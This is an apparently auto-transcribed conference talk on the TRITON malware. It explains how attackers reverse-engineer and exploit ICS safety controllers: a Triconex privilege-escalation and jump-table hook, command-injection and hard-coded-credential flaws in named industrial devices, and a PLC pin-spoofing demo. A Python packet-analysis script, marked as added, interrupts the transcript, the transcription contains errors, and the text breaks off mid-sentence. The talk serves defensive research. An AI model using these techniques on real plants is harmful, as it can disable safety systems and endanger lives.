Thru the Eyes of the Attacker: Designing Embedded Systems for ICS

Video in TIB AV-Portal: Thru the Eyes of the Attacker: Designing Embedded Systems for ICS

Formal Metadata

Title
Thru the Eyes of the Attacker: Designing Embedded Systems for ICS
License
CC Attribution 3.0 Unported: You are free to use, adapt and copy, distribute and transmit the work or content in adapted or unchanged form for any legal purpose as long as the work is attributed to the author in the manner specified by the author or licensor.
Release Date
2018
Language
English

Content Metadata

Abstract
In 2017 a malware framework dubbed TRITON (also referred to as TRISIS or HatMan) was discovered targeting a petrochemical plant in Saudi Arabia. TRITON was designed to compromise the Schneider Electric Triconex line of Safety Instrumented Systems (SIS), potentially in order to cause physical damage. TRITON is the most complex publicly known ICS attack framework to date and the first publicly known one to target safety controllers. While the functionality of the malware is understood, little is known about the complexity of developing such an implant. The goal of this talk is to provide the audience with a “through the eyes of the attacker” experience in designing advanced embedded systems exploits & implants for Industrial Control Systems (ICS). Attendees will learn about the background of the TRITON incident, the process of reverse-engineering and exploiting ICS devices and developing implants and OT payloads as part of a cyber-physical attack and will be provided with details on real-world ICS vulnerabilities and implant strategies. In the first part of the talk we will provide an introduction to ICS attacks in general and the TRITON incident in particular. We will outline the danger of TRITON being repurposed by copycats and estimate the complexity and development cost of such offensive ICS capabilities. In the second and third parts of the talk we will discuss the process of exploiting ICS devices to achieve code execution and developing ICS implants and OT payloads. We will discuss real-world ICS vulnerabilities and present several implant scenarios such as arbitrary code execution backdoors (as used in TRITON), pin configuration attacks, protocol handler hooking to spoof monitored signal values, suppressing interrupts & alarm functionality, preventing implant removal and control logic restoration and achieving cross-boot persistence. 
We will discuss several possible OT payload scenarios and how these could be implemented on ICS devices such as the Triconex safety controllers. In the final part of the talk we'll wrap up our assessment of the complexity & cost of developing offensive ICS capabilities such as the TRITON attack and offer recommendations to defenders and ICS vendors.
It's time. Yesterday, if you were in here, we saw a Teddy Ruxpin get hacked, and today we're gonna do something a little bit different: we're gonna do power plants. So this is going to be very exciting. Let's give Jos and Marina a big round of applause.

Good morning. Thank you so much to all of you for coming here. So today we will present what it takes to design embedded exploits to actually cause physical damage to an industrial facility, from the beginning to the end. So, briefly about ourselves; I will let Jos present.

Yeah, so my name is Jos Wetzels. I'm an independent security researcher with Midnight Blue. I mainly focus on different kinds of embedded systems: industrial control systems, automotive, IoT. And I previously worked as a researcher at the University on critical infrastructure security.

So my name is Marina Krotofil. My major specialization is physical damage, and I've been doing it for more than eight years. I presented a lot of works at Black Hat and DEF CON. So how this combination of ours came together: on one hand, Jos can reverse engineer and develop exploits and implants for any embedded system in the world. However, what exactly do you want to do on that device? That is my specialization: here is this power plant, chemical plant, traffic light system, robotic system; how exactly do you want to cause physical damage? So I will design and engineer the exploitation scenario to cause physical damage, and at the end I will come up with a set of algorithms which need to be implemented, and a long list of tasks which need to be executed on that embedded system. With this wish list I would go to a guy like Jos and say: hey, this is what I need to do on that device. And maybe somewhere we will also meet in between, when we look at the design of the device: hey, can specific design features of the device probably be used to accomplish several tasks simultaneously? So this is where we would be working together, and this is how the combination came into place, and this is how we will be presenting the presentation.

So after the introduction to industrial control systems and safety systems (by the way, how many of you have heard of TRITON? I hope everybody, good, because that was our motivation; we also wanted to show that in the mass media this TRITON exploit was described as so sophisticated, only state-sponsored, only a few people, and we will show you if it's really so), we will go into the device exploitation, because in the end you need to obtain code execution on the device. After you have code execution, then you start developing, for example, implants like backdoors, and payloads which are actually designed for the physical damage. And of course conclusions in the end. As you already probably noticed, I'm speaking very fast, and there is a reason for that: because the topic which we are presenting to you is extremely complex, but we still wanted to show you the process from the beginning to the end, and still of course without deep details, and it's already a lot. So it will be a fast-paced talk; however, again, the motivation was to show you the full process so that you could see it from the beginning to the end. And we will be posting an even longer version of the slides after this talk, because we had to cut out certain information, and if you're interested you can go and review it again.

Introduction. So what are the industrial control systems? Well, you probably all know, but it's important to set up your vocabulary so that all of us operate, for this talk, on the same terms. So industrial control systems: those are computerized systems and networks which control a physical process. So typically, if you talk about an industrial organization, there will be a corporate network, and there will be another network which is called SCADA or control network. And even though these are the same-looking computers, one will be called information technology and another will be called operational technology. Overall, nevertheless, that is still all computing devices, and the guys who deal with these systems typically studied something like computer science. And as we are moving towards the physical process, this is already engineering science, and it's completely different. So the lower, the closer we come to the physical process, the computing devices which actually monitor and control the physical process look like this, and we typically know them as embedded systems. So they don't have an operating system as we know it; the operating system which actually runs the device and executes the programs is called firmware. And since these systems are real-time systems, the entire firmware must be loaded and executed in memory at all times. So on one hand the attacker needs to execute code, so the attack will be executed on this embedded system; it's still the cyber domain, in order to cause that physical damage, and basically damage, for example, the machinery, and operate the machinery as needed. So when, for example, the attacker is penetrating the financial sector, his goal is to steal money in some form. When the attacker has penetrated the industrial network, his goal is to cause some form of physical damage in the physical domain. It could also be economic damage, like spoiling the product; however, in the mass media typically this physical damage is depicted as a big explosion.

So the ICS threat landscape has changed in the past eight years. I started doing this type of security before it was fashionable and nobody knew about it. While in the IT domain there was a crazy amount of hacking happening all the time, industrial control systems lived in bubbles; nobody knew about them. And then Stuxnet happened. So Stuxnet was kind of a trigger and a tipping point, because we started seeing more and more publicly known espionage attacks, and in some ways we started seeing the first publicly known activities related to recon of the operational technology systems. So from 2015 that started to happen, and so there were two power grid attacks in '15 and '16, and in '17 (basically it was announced at the end of 2017) TRITON happened. It was an attack that tried to install a backdoor or remote access trojan on a safety controller, and it was a big thing because it was picked up by pretty much every mass media outlet, including the Wall Street Journal, which said that that is a very, very, very alarming situation. And why was TRITON so special? Because it targeted a safety instrumented system.

So what does it mean exactly for us? Physical processes are inherently hazardous, so it means that there are toxic, flammable liquids, fires and explosions, electrical hazards, moving parts, machinery. So there are a lot of layers of safety protections to prevent harm or maybe even casualties to humans, first of all, and secondly to prevent environmental damage, and also to the machinery, because it's expensive to kill the machinery. So the layers of protection start with the design of the process; then we have control loops; then we have a human operator who can react to the alarm. But as soon as the control system and the human operator are no longer able to control the process in a safe manner, we have the so-called safety instrumented system. That is an independent control system which reacts to the hazardous condition and tries to prevent it. So as you can see, this is the last line of defense before the hazardous accident is already happening. And the attacker was apparently trying to disable this system, so that is an actual attack on civilians, which is not good.

Previously... So safety instrumented systems are software systems, and because it is the last line of defense, typically it is recommended that they would run on an isolated and segmented network. But for ease of design and for ease of maintenance they are often connected to the main control system, and that allows the attacker to obtain remote access to safety instrumented systems. And that was the Triconex from Schneider, and it is a very critical safety instrumented system of Safety Integrity Level 3, which is only 2% of all hazardous situations, for example in oil, that are of that severity. So it's a very critical safety system. Triconex is everywhere; for example, you could find it on the swimming shapes and so on.

So the attacker obtained remote access to the engineering station, which was connected to the safety controller, so they got the ability to communicate to the safety controllers. And what the attacker attempted was to inject a passive backdoor, or some people refer to it as a remote access trojan, which would allow the attacker to read arbitrary memory, write into the memory, for example shellcode for the attack, and then execute that code.

So now, even if you have the backdoor, it really means nothing to you, because unless you know what you want to achieve in the plant, the backdoor is actually absolutely useless and harmless. So the attack scenario depends on the attacker's goal, and sometimes it means an explosion, but in most cases it does not, because you don't need to over-engineer if you just want to send a warning sign to your enemy or whatnot. And you can achieve some simple attacks: there are certain buttons on the HMI which have descriptive labels like stop, start; you can press it and you achieve some effect, but you know that is not a long-lasting effect. So yes, the first type of physical attacks happened at the HMI; then the attackers moved their exploits, for example in Industroyer or CrashOverride, where they were executing the attack already at the level of the industrial protocols; but now we have TRITON, which is already on the embedded system. So what's going on, why is the attacker already moving their exploits into the embedded systems? We will explain. So industrial processes are very complicated, and they are actually built and designed inherently to be robust and recoverable. So if the attacker wants to achieve any significant, long-lasting damage, they actually need to obtain very specific, very detailed process comprehension: the design, the dynamic behavior of the process, the physics and so on. So for example: what causes the pipe to explode? Well, what causes the right pipe to explode? And then, what causes the right pipeline to explode at the right time? And suddenly the complexity is increasing.

So industrial control systems operate on the control loop principle. So control systems and human operators use sensors to observe the state of the process, and then the control system computes the commands to instruct actuators to control the process and bring it into the right state. So in a nutshell, when the attacker starts designing and engineering the damage scenario, there are a huge number of tasks which he has to accomplish, starting of course from manipulating the process; but then the attacker also needs to obtain a feedback loop to know whether the process is moving into the right state and he is successful. I've been doing this for many, many years and I've designed a lot of damage scenarios, and I can tell you that obtaining feedback loops was one of the hardest tasks to achieve, because mostly the sensors which are installed there in the plant are not useful, because the attack is always something weird, and the plant was not designed to measure something weird going on. So you have to do it indirectly. And of course, because you are trying to bring the process into the wrong state, the harmful state, the control system and human operators and safety will try to fight you back and bring the process back into the normal state. So the attacker also has to prevent the response, and TRITON falls into this category, preventing response, because they wanted to prevent the response from the safety systems. So in a nutshell, the cyber-physical attack or damaging attack will be a collection of clandestine control loops, because the attacker is becoming a control system, and you have to have this cycle of observation and manipulation to achieve the unsafe state. So attack timing is crucial, because the process is not vulnerable at all times, so you have to find that vulnerable time when the attack has to be executed. And attack coordination is critical, as you have seen there have been a lot of tasks, and for example observation is of state 8 and component
by component B needs to trigger payload XYZ, so this requires very granular control across the entire process, to manage the tasks, their quantity and timing. So there was a very nice presentation, even though I've been presenting on that topic many times, there has been a nice presentation from Jason Larsen who decided to compare different damage scenarios, and he came up with this timing and state diagram where he divided all the damage tasks in the damage scenario into the different tasks, where he also tried to map: hey, this is a set of tasks which I need to execute, how do I map them now to the different devices and to the different implants? So basically, as soon as the number of tasks which you need to execute to achieve damage becomes large, you need to have an implant, because with separate tasks you will not be able to coordinate them. And this also allows you to coordinate, so you can easily install the coordination between the implants via the communication links, or you can implement a routine to detect a specific state, and it's also much more stealthy because you do not create anomalous network traffic. But before that, in order to actually achieve this, to implement an implant, you first have to exploit the device, and you'd better enjoy extreme programming, because those devices are extremely small, have very limited resources, and they are packed with functionality, so you first have to actually find something the device does not need and eliminate it, so that you could put in your actual exploitation code. So at the end Jason came up with this diagram where he scored the different tasks and compared the reliability, because it's not only the reliability of the attack scenario but it's also the reliability of your exploit or implant on the device, and so basically you have to find this trade-off: what is the most reliable attack, implant and damage scenario, and implant stability. So now, after this long introduction, I am giving it back to Jos and he will walk you through the device exploitation and design, and basically implementation. So now I have my wish list of tasks and I'm giving it to him to implement.

All right, thank you Marina. So before we can do all this, before we can get, you know, to the cool stage where things are actually exploding, we'll have to get to another
cool stage, which is exploiting the device, and basically the process is as follows, and I'll walk through these steps. We start by obtaining the necessary material, so we need a couple of things before we can devise an exploit and an implant. The first thing we'll need is documentation, and a lot of it: developer's guides, planning and installation manuals, all that kind of stuff. And in the case of Triconex it was very useful that these things are safety certified at a certain level, and that means that all of the documents were available on the website of the US Nuclear Regulatory Commission, so very detailed information was out there; in other cases you might have to buy it, but this is the first step. Then the second step is obtaining the engineering software. So these devices are connected to a workstation running, I don't know, Windows XP with some software that is used to program them, and this software usually contains the functionality for talking to this device and the protocol, so you want to take a look at it. You obtain this by just going to the vendor website or asking them nicely, which is the easiest route, or if you have already compromised asset owner networks you might take it from their own network, because you're in there already, so why not grab a souvenir, or you might go to the various sketchy sources on the internet like eBay or Alibaba or open directories hosting this kind of stuff. So it's usually relatively easy to obtain; in the case of Triconex we found the TriStation software for the equivalent of three US dollars on some Chinese website, so that was relatively easy. Then we have to obtain the device, and that's a little trickier, because you're not going to find that kind of stuff at a yard sale or in a corner shop or whatever; it's very expensive, and you might have to buy multiple copies because you might have to do a teardown or you might break a device, etc. So ideally you buy it directly from the vendor, but if you're a nation state sponsored attacker you maybe don't want to directly do that, so you need straw men, or you buy it at a bankruptcy auction, or again eBay or Alibaba, or your friend. So here you can see, it's relatively expensive, in most cases a couple of thousand bucks for one of these controllers, and you need multiple parts to put the whole thing together, so it's not very cheap. Then you need to obtain the device firmware, the stuff that runs on the device itself. You have various options here: you can sometimes download it from the vendor website or extract it from some update utility, that's the easy approach, or you might have to extract it from the flash chip on the device itself, go the hardware hacking route, and this can become very complicated, because in a worst case scenario you'll have encrypted firmware, you'll have chip readout protection you need to bypass, and do side-channel attacks and all that kind of stuff. But for Triconex that was not necessary, because there was no readout protection on the flash; you could just desolder it, put it into an adapter and use a universal programmer and you'd be good, or you could just get it from
the firmware update utility, which also holds it. The second step you have to do is usually device teardown and PCB analysis, so we need info on what kind of microcontroller is on this device, we need the device's functional domains, so what is happening where on this device, we need to know about interesting interfaces like UART, JTAG, what have you. Sometimes we're lucky: if it's an FCC certified device you have an FCC ID and you get internal photos and documentation on the FCC website; sometimes other people have done your job for you and you have public teardowns, and that's very nice. In the case of Triconex the planning and installation guide has very detailed internal block diagrams, and that helps a lot because that saves you the effort of opening it up, but in some cases we're not so lucky and we will have to do teardowns. Now people who don't come from a hardware hacking background are usually terrified of it, but it's not that complicated in most cases; like the picture shows, it's RAM, flash, or you google it.

And there is this persistent narrative, especially among some OT people, that ICS devices are all different, and operational technology is not like the embedded devices you're used to, but for our purposes it's like all the IoT devices out there that are getting hacked by the billions every day. For example, take these two PLCs by Schneider Electric, the Modicon M238 and the M340: usually you have a central processor module which does all the heavy lifting, and you have a couple of input/output modules which you stitch on to the side, as you can see on the right of the slide; you might have an integrated Ethernet connector, as you can see on the right example, or maybe you have a dedicated module that does the Ethernet stuff and then connects to the main module over a serial link. And internally they typically look something like this: you have a couple of I/O pins, you've got your serial link or Ethernet link or whatever, and then you have a microcontroller in the middle, and typically this microcontroller will run the main firmware, which has the operating system and some of the application stuff, like maybe a web server and an FTP server or whatever, and then you typically have a logic handling chip, which might be an FPGA or another microcontroller executing the actual programs that this thing is configured and programmed with. Now this might differ between PLCs, because this is a generalization, but it roughly comes down to something like this. And for Triconex it looks like this: you have three main processors and they communicate over TriBus, which is an internal bus that does some voting on input values for consistency, and it's a triple modular redundancy architecture to ensure that a vote of two out of three overrides any errors that are introduced there. Yeah, that's basically what it looks like: the main processor, and there you have it, it runs a PowerPC chip, and you have a dedicated other chip for input/output and communication stuff, and we'll delve into this a little bit later when it becomes relevant. So the first thing you want to
look at for most ICS stuff is reverse engineering of all the protocols they talk, because in many cases these are legacy and proprietary protocols, usually ports of old serial protocols that have been retrofitted onto Ethernet; they control very sensitive functionality like starting and stopping the PLC, updating the firmware and so on, and you might find a way to get into the device itself by remote code execution here, and that's what we want. So the first thing we need to know when encountering a protocol we don't know is the packet structure and the semantics. We can do this in a couple of ways, and this is a very quick generalization, but usually you go about comparing it to functionally similar protocols that have been documented, so if it's a port of an old serial protocol maybe take a look at what that looked like and what you can recognize in there; test for common encoding structures like TLV, sequential identifiers, checksums; do entropy analysis for fields that indicate cryptographic functionality; or you might want to do differential analysis of functional batches of packets, so you have one packet that corresponds to starting the PLC, one that corresponds to stopping the PLC, in different kinds of conditions, and then see what kind of bit fields in the packets change and what you can make of that. And as Rob says, believe it or not, if you stare at the hex dumps long enough you start to see the patterns, and that is definitely true for pcap-only analysis; as you can see here, it's basically like looking at the Matrix. Now ideally you want to assist this traffic-only analysis with binary reverse engineering, because you want your reconstruction to be complete and sound; you want to write a reliable exploit, not because you don't want to mess things up, but because you don't want to mess things up for yourself. So a pcap-only analysis can be incomplete, inaccurate or opaque: you can have undocumented or rare behavior that you don't see in the field but that's in there and you're interested in, you might guess at semantics that might not actually be what you think they are, there might be encryption, compression, blah blah blah, and most importantly pcap-only analysis damages your sanity, so you want to do some binary reverse engineering, which does that to a lesser extent.
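The differential analysis of functional packet batches just described, as an added Python example that is not part of the talk or the speakers' tooling: the packet format is a constructed toy protocol (not TriStation), and the script classifies each byte column of two captured batches ("start" and "stop") as constant, sequence number, function code or data/checksum, and computes per-column entropy. It is the same first step a defender takes when writing a dissector or a detection rule for an undocumented protocol.

```python
"""Differential analysis of functional packet batches (constructed sample data).

Added example; the toy format is magic(2) | seq(1) | func(1) | value(2) | sum8(1).
The idea: group captured packets by the action that produced them ("start",
"stop"), then compare each byte column within a batch and across batches.
"""
import math
from collections import Counter

MAGIC = b"TS"  # constructed magic bytes, not a real protocol's


def build_packet(seq: int, func: int, value: bytes) -> bytes:
    """Constructed packet with an 8-bit additive checksum over the body."""
    body = MAGIC + bytes([seq, func]) + value
    return body + bytes([sum(body) & 0xFF])


# Constructed capture: four packets seen while starting the PLC, four while
# stopping it; the 2-byte value field varies non-sequentially within a batch.
SAMPLE_VALUES = [b"\x12\x34", b"\x00\x80", b"\x12\x34", b"\xff\x01"]
CAPTURE = {
    "start": [build_packet(1 + i, 0x0F, v) for i, v in enumerate(SAMPLE_VALUES)],
    "stop": [build_packet(5 + i, 0x10, v) for i, v in enumerate(SAMPLE_VALUES)],
}


def column(packets, offset):
    """Values of one byte position across a list of packets, in capture order."""
    return [p[offset] for p in packets]


def is_constant(values):
    return len(set(values)) == 1


def is_sequential(values):
    """Strictly +1 in capture order: a candidate sequence number or counter."""
    return all(b - a == 1 for a, b in zip(values, values[1:]))


def column_entropy(values):
    """Shannon entropy in bits of one column: 0 = constant, log2(n) = all distinct.
    High entropy across many packets hints at checksums or crypto fields."""
    n = len(values)
    return -sum(c / n * math.log2(c / n) for c in Counter(values).values())


def classify_columns(batches):
    """batches: dict action -> packets of equal length, in capture order.
    Returns dict offset -> role guessed from within/across-batch behaviour."""
    everything = [p for b in batches.values() for p in b]
    length = len(everything[0])
    if any(len(p) != length for p in everything):
        raise ValueError("toy analysis assumes fixed-length packets")
    roles = {}
    for off in range(length):
        per_batch = [column(b, off) for b in batches.values()]
        if is_constant(column(everything, off)):
            roles[off] = "constant (magic/version/padding)"
        elif all(is_sequential(v) for v in per_batch):
            roles[off] = "sequence number"
        elif all(is_constant(v) for v in per_batch):
            roles[off] = "function code (fixed per action, differs across actions)"
        else:
            roles[off] = "data/checksum (varies within an action)"
    return roles


def report(batches):
    """Human-readable summary: role and entropy per byte offset."""
    everything = [p for b in batches.values() for p in b]
    lines = []
    for off, role in classify_columns(batches).items():
        ent = column_entropy(column(everything, off))
        lines.append(f"offset {off:2d}: H={ent:.2f} bits  {role}")
    return "\n".join(lines)


if __name__ == "__main__":
    for action, pkts in CAPTURE.items():
        for p in pkts:
            print(f"{action:5s} {p.hex(' ')}")
    print(report(CAPTURE))
```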
In the case of Triconex, the TriStation software has a communications DLL, and this has all the juicy stuff we need. It's a single DLL in the engineering software and it has debug symbols, so that greatly eases our life, and as you can see on the slide, I hope it's visible, basically all these functions have a good semantic mapping between the functionality it does, like starting the PLC, stopping the PLC, downloading the control logic, and the function code within the protocol itself, so you can relatively easily identify all that functionality, and you can see that the attacker probably went about it this way. Now the benefit for attackers is that you don't need to fully reverse-engineer the protocol, you only need to understand a few interesting packet types, because we don't want to craft a full protocol parser, we want to craft an exploit, so I don't care about all the rest, I care about that one packet type that does the good stuff. Now when it comes to vulnerability
discovery, which is typically the step that comes after this, the next step is getting code execution, right, and ideally this is a pre-authentication vulnerability, though as we'll see, preauth is a relative concept in the ICS world, and in many cases ICS vulnerabilities are often a byproduct of the reverse engineering, so in most cases you won't need to go about fuzzing or static analysis of the firmware; in many cases it's insecure by default, there's ancient legacy sh*t everywhere, and you shake a stick at it and vulnerabilities fall out. So let me briefly drink something.

An example of this is the Moxa NPort serial-to-Ethernet/Wi-Fi converter: you plug in a serial cable and it converts it to Ethernet; it has a web interface with broken authentication, so it hashes on the client side, that's good; once you're in you can do command injection in the ping test form, so you've got your code execution right there. Another example, the Opto energy monitoring and control device used in fairly sensitive environments: it's got FTP, it's got a proprietary protocol without authentication. Now the thing is, you can configure FTP with a password, you can enable IP filtering, all that kind of stuff, but then you can use this unauthenticated proprietary protocol to disable IP filtering, enable FTP and ask for the credentials nicely, and then you get them, and you can use the FTP to upload a new piece of firmware and reflash the device over FTP, and there's no firmware signing, so again that's easy code execution right there. Another example, in case you don't believe me, the Modicon Quantum PLC, that's a large PLC for process applications: it has FTP with hard-coded credentials which allows you to read and write configuration, firmware, what have you; it has a telnet with a hard-coded backdoor, and that's actually a C interpreter, which is nice; it also has an unauthenticated proprietary Modbus extension for starting and stopping the PLC, overriding the programmable logic; there are basically excellent ways to get code execution on this thing. And finally, to drive the point home, a serial-to-Ethernet converter by Advantech: it has a web interface again, and the nice thing is that if anyone unlocks the web interface on one PC, let's say a legitimate operator, it's disabled for everyone, so you know, and then you have a command injection in the email alert setup form, and again easy code execution right there. I mean, you get the idea, it's like shooting fish in a barrel, right. And before TRITON it was basically the same thing; it wasn't exactly a packet-police vulnerability, so the vulnerability was a freebie of the protocol reverse engineering: you have this safety program download functionality, which is how the engineers put the actual logic on the thing, and it has no authentication, and the safety logic that gets downloaded to the device has no secure signing, right, so you can basically skip all the way from reverse engineering to exploit development, and that's neat from an attacker point of view, not too neat from a defender point of view. And then that
brings us to exploit development. So after we find a suitable vulnerability and we get our code execution, we need to craft an exploit to actually, you know, not just execute the logic we want but execute the instructions on the microcontroller we want. And how would this look in the case of TRITON? Well, Triconex has safety and control applications which are developed in one of these IEC languages, many of them look like a graphical language, like you can see on the bottom of the slide, and they typically get compiled and downloaded and executed on the main processor there, and that's nice because that gives you another exploit development freebie: you don't need to break out of any sandboxes, you don't need to exploit any runtimes, and because in the case of the Triconex controller the logic was executed on the same chip that the operating system was executed on, you don't need to hop across any chip perimeters, you're right where you want to be. So TRITON did have to add some additional functionality so that it doesn't overwrite the original programming but appends to it, and the reason why it did this is because it allows the safety logic to continue running without interruption, because once you're implanting this device you don't want everything to stop and potentially already cause a process shutdown; you want to be stealthy, at least at that point. Another complication is the key switch on the Triconex controllers, so these devices have a physical key switch that allows you to set it to a certain mode, and only if it's set into the programming mode can you actually download new logic to it, and this is something that will be relevant later when we discuss the payloads.

Another complication of embedded exploitation in general is heterogeneity, so embedded devices are far more heterogeneous than general-purpose ones: you deal with a billion architectures, from ARM to MIPS to PowerPC to whatever, a billion kinds of operating systems like VxWorks or QNX or even custom operating systems, and in the case of Triconex that means that you have different architectures and operating systems between different versions, so version 9 had a National Semiconductor chip, versions 10 and 11 had PowerPC, and for the attacker this means that scaling the attack requires writing and modifying payloads and implants for each different version, so there's some effort involved there. And that brings us to the development of the implant and the OT payload, and that's the stage that's close to what Marina mentioned of mapping the TSD to the implants on the devices, and then we get to this stage. Now we have
code execution, we can run arbitrary PowerPC shellcode, so now what? Well, exploitation is just one step among many, so for complicated OT payloads we will need to develop this implant and then after that craft the OT payload. We have different kinds of strategies here: we can directly implant the OT payload straight away after exploiting the device, or we can implement a backdoor which would allow us to keep the OT payload secret until, you know, zero hour, and basically provides you with kill switch capabilities, or in the jargon of some people a dormant cyber pathogen, that basically would allow you at a later stage to execute any kind of payload you'd want. The second thing we'll have to decide on is whether we'd go for cross-boot persistence, which would require modifying the flash, and we need enough space there to insert the implant, or, which is what TRITON did, we just go fully memory resident; that requires executable RAM, but it does mean that on reboot the implant is gone. Now for safety controllers this is not that relevant, because these have an extremely high uptime, so even if it would be gone upon reboot it's probably going to be there all the time anyway, and this has the added benefit for the attacker that it does complicate forensics. The other thing you want to think about when designing an implant is the scalability of the implant, so you want to target devices that are common throughout ICS, so not only for one particular facility you might be interested in but across different kinds of facilities, different kinds of industries, and Triconex fits this bill: there are 18 thousand, or more than 80 thousand, Triconex systems in over 80 countries, so having these kinds of capabilities is very interesting from a strategic point of view. You also want to target, if you're targeting software instead of controllers, the software that is common throughout ICS, so used across multiple vendors; protocol and connectivity stacks are usually reused by multiple vendors, so having exploits for that kind of stuff really scales well, and the same goes for control runtimes or the operating systems in question. You basically want to construct an arsenal of exploits and implants against common devices and software stacks, because that means that it is a one-time upfront investment, and there is no huge turnover in these devices; these have an extremely long field life, they get deployed for 10, 20 years, they don't get updated very often, if there are even updates out there, so if you invest once in an arsenal for, let's say, all safety controllers that are relevant in the market right now, it's going to be an investment that's going to be paying off for a long time. So TRITON makes more sense as a tool in such an arsenal than a very expensive one-off that was engineered for this particular attack.

So that brings us to the reverse engineering of the ICS firmware. Now the first thing you'll have to do is extracting the firmware, so you have to determine the firmware format and then unpack; sometimes there will be firmware from multiple chips on the board, or data blobs, and they're glued together and you'll have to get them out of the firmware, and then you'll have to do the decompression and the decryption if there is any of that present. This might be simple, keys might be present in a firmware loading utility, or you might have to actually do side-channel attacks; in the case of Triconex this was very easy because the firmware was unencrypted, so basically this step could be skipped. The stuff that you do after that is pre-processing the firmware, so you need to obtain a memory map: you need to know where on this chip does the ROM live, where does the RAM live, where does the external memory live, the special-purpose registers for interacting with peripherals, all that kind of stuff, and you typically get this from the datasheet, so very important if you do this kind of stuff, you need to learn the lore of reading datasheets. So after you know basically the lay of the land here, you go about
identifying the base address, so you need to know where this particular firmware image is loaded into memory. There are many approaches here, and this is a gross oversimplification, but we simply don't have the time to go into all the details; this can be as simple as, you know, being loaded at the chip's fixed address, you can reverse engineer the update utility and see where it places it, or you can extract it from something like the interrupt vector table or the bootloader or self-relocating code, jump tables, string tables, all that. Let's consider for example this RTU firmware piece: this is a piece of firmware for a remote terminal unit that's deployed somewhere in the field, it's ARM based, and we have this piece of firmware and we don't know what the base address is, so we load it just at address 0 and then we see all these different branches; does anyone recognize what this is? A couple of people. Well, yeah, that's the interrupt vector table of an ARM chip, so the first entry is a branch to the reset handler, and basically if we look at the offset we have 100 as an offset here, and here we have 102; if we look at that offset we see a lot of toggling with these special purpose registers, and that's very typical behavior of a reset handler. So if we then subtract the thousand, basically that becomes the base address; we rebase the firmware image and we can see that it cleans up nicely. Now we know how to load it into memory.
After you've done this, you know where to load it, you know where everything is laid out, and you have to reconstruct the complete code and data topology of the firmware. Firmware images are not neat executable formats like PE or ELF or Mach-O, I mean your mileage might vary for what qualifies as a neat executable format, but this definitely is not it. We will have to heuristically identify the functions in there, the strings, the jump tables, the structs and all that kind of stuff. This is usually the bulk of the work, doing all this reverse engineering; the upside is that we don't need to reverse engineer the full firmware, only up until readiness for this next step, because we want to hunt interesting functionality, we want to reverse engineer in a sniper-like fashion, so we want to know how does the control runtime work that actually interprets and handles this safety logic, where are the protocol parsers, where are the communications and peripheral I/O handlers, where is any security or safety related functionality there. So what would this look like for
the Triconex 3008, which was targeted by the TRITON attack? Well, its firmware is PowerPC-based, which is nice because the Hex-Rays decompiler is available for that, and that saves you a lot of work; it's not a substitute for reading the disassembly, but it eases your navigation across this firmware. It uses a custom operating system with 27 system calls, and some sparse documentation exists, thank you NRC. Basically this is what the operating system looks like: you have a scan task, a communications task and a background task, and we're really only interested in the scan task, which fetches inputs from shared memory, which is where all the analog and digital I/O gets put, then we do a TriBus transfer for the voting on consistency, and then we run the actual control logic, and then we send the outputs again to the shared memory, and basically this implements all these control loops. So the targets here would have been the memory layout and management, because we want to achieve this memory residency, so we need to know how to do that; then we need to look for consistency checks and diagnostics functionality for implant stability, we don't want anything messing with our implant while running; we need to know where the network command dispatcher functionality is, because we want to be able to communicate with it over the network and achieve that; we want to know if there's any privileged mode management, we want to do anything we can on this device, so if there is privilege management we want to escalate; and finally we need to know the scan task and the I/O transfer stuff. So that's basically what the TRITON implant looks
like and does. It has four stages: it has an argument setter, an implant installer, the backdoor implant and then a missing OT payload. The argument setter is not that interesting, but it basically controls the init state machine of this thing, which first, if you can see that properly, does an exploit for privilege escalation and then basically relocates the implant, the third stage. So the privilege escalation exploit looks complicated, but it's not; it's basically a write-what-where because of improper handling of memory privileges that allows you to write this value to this address. What does this mean? Basically what happens is that once you invoke a system call on this particular firmware it saves the machine state register, and when it returns it restores it, and it is stored at this particular address that anyone can write to regardless of privileges, so if we overwrite it with this value we set bit 17 to supervisor privileges and escalate, and that allows us to do these next steps to install the implant, the first of which is copying the payload into the firmware area of memory, which allows us to achieve residence even if they wipe all the safety logic on the controller; then we patch an entry in the jump table, which allows us to hook a network command and then invoke our implant when this particular network command is called; and then finally we patch a certain RAM check, which was used for consistency between the firmware in ROM and in RAM and which would otherwise mess with our stuff. And this is basically the backdoor implant, like Marina mentioned: it allows for reading, writing and executing arbitrary memory, and basically allows you to override this key switch, so once you implant it, it doesn't matter what position they turn the key switch into, it allows you to execute anything you want in memory, so we have persistence on this device. So the fourth stage, which is the most engineering related, is the OT payload, and this was missing, because this carries out the meat of the attack, and we can only speculate what this might have looked like, and that's something we'll do. So because TRITON is positioned here in the attack tree, at the control and safety system, this is what the OT payload would have been related to. So basically it could have been, for
example an i/o spoofing scenario and that would have been a scenario that marina would have given to me and said you know we want to do spoofing of input and output values as you can see
for example here you have measurement values they come as an input signal to the controller and as an output signal go to the instrumentation and then we want to mess with either the input or the output to cause some unsafe State now internally this looks like this on
these devices so you have the physical i/o you have logic and there is an intermediary variable table that manages this and the Tri connects this is
handled by an i/o processor that has shared memory connection to the main microcontroller and that's where it places this variable table so we didn't
have a track connection controller but we did have a Wargo PLC and I mean it basically comes down to the same thing it's an ARM Cortex PLC running real-time Linux it has a vulnerability in the codesys runtime on TCP that you can explode remotely and gain route and basically what we do in our attack is we use the CPU debug registers to catch any access to this memory mapped i/o and then we write a custom exception handler that gets invoked when this this debug trap is invoked and we change the pin mode for example from output to input so any writes that would be have been going to an actuator like closing a valve are now going to an input pin and they don't actually go out and we have a little demo of this that should be coming up
Well, we don't have a lot of time, but all right. So what you can see here is you have the WAGO PLC on the right, and then you have an LED which is standing in for, you know, a valve, and it's supposed to be blinking every couple of seconds, and now you can see it. Yeah, now you can see, basically, the engineering software, and the attacker will soon... yeah, I can't really skip anything here, but there should pop up a shell at some point. Now you can see the LED blinking there. All right, yeah, so, you know, this is a root shell on the PLC. We execute our payload, which is basically a Linux kernel module that does this thing I just mentioned about the CPU debug registers, and then we stop it, and you can see the LED will stop blinking, while it should be consistently blinking, because it, you know, now thinks it's an input pin. And then at some point, you know, we'll change it back again to an output pin, and then you can see it's starting blinking again, right? If this was a valve it would have had an impact; now it's an LED and, you know, it's just a demo. So that brings us to the second
